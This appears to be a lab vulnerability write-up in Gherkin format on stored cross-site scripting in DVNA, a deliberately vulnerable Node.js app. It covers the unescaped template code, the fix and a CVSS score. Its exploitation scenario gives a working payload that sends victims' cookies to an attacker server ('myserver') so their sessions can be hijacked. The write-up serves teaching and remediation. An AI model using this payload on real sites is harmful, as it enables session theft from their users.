## Version 1.4.2
## language: en

Feature:
  TOE:
    DVNA
  Category:
    Injection Flaws
  Location:
    /app/modifyproduct - description, name, tags (Parameters)
  CWE:
    CWE-0079: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting') -base-
      https://cwe.mitre.org/data/definitions/79.html
    CWE-0074: Improper Neutralization of Special Elements in Output Used by a
    Downstream Component ('Injection') -class-
      https://cwe.mitre.org/data/definitions/74.html
    CWE-0990: SFP Secondary Cluster: Tainted Input to Command -category-
      https://cwe.mitre.org/data/definitions/990.html
  CAPEC:
    CAPEC-592: Stored XSS -detailed-
      http://capec.mitre.org/data/definitions/592.html
    CAPEC-063: Cross-Site Scripting (XSS) -standard-
      http://capec.mitre.org/data/definitions/63.html
    CAPEC-242: Code Injection -meta-
      http://capec.mitre.org/data/definitions/242.html
  Rule:
    REQ.173: https://fluidattacks.com/web/es/rules/173/
  Goal:
    Execute JS in victim's browser
  Recommendation:
    Sanitize user input and properlly escape output

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running DVNA in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  No access control
    Given I see the code at "/root/workbench/dvna/views/app/products.ejs"
    """
    47  <% if (output && output.products) { for(var i=0; i<output.products.lengt
    h; i++) { %>
    48  <tr>
    49      <td><%- output.products[i].id %></td>
    50      <td><%- output.products[i].name %></td>
    51      <td><%- output.products[i].code %></td>
    52      <td><%- output.products[i].tags %></td>
    53      <td><%- output.products[i].description %></td>
    54      <td>
    55          <a href='/app/modifyproduct?id=<%=output.products[i].id%>'>Edit
    </a>
    56      </td>
    57  </tr>
    58  <% } }%>
    """
    Then I see it displays data with "<%-" instead of "<%=" not escaping it

  Scenario: Dynamic detection
  Fuzzing for XSS
    Given I go to "http://localhost:8000/app/modifyproduct"
    And ass a new product with description
    """
    <img src=# onerror=alert(1)></img>
    """
    Then I save the product and get an alert in the product list screen

  Scenario: Exploitation
  Stealing user cookies
    Given I inject a cookie stealing payload into a product description
    """
    <img src=# onerror=document.location="http://myserver/?c="+document.cookie>
    </img>
    """
    Then when a user goes to the list, I get their cookies in my server
    And I can hijack their sessions

  Scenario: Remediation
  Access control
    Given I patch the code like this
    """
    47  <% if (output && output.products) { for(var i=0; i<output.products.lengt
    h; i++) { %>
    48  <tr>
    49      <td><%= output.products[i].id %></td>
    50      <td><%= output.products[i].name %></td>
    51      <td><%= output.products[i].code %></td>
    52      <td><%= output.products[i].tags %></td>
    53      <td><%= output.products[i].description %></td>
    54      <td>
    55          <a href='/app/modifyproduct?id=<%=output.products[i].id%>'>Edit
    </a>
    56      </td>
    57  </tr>
    58  <% } }%>
    """
    Then the output is html escaped and XSS is not posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.3/10 (Medium) - AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.9/10 (Medium) - E:F/RL:O/RC:C/
  En4.9onmental: Unique and relevant attributes to a specific user environment
    5.9/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-25
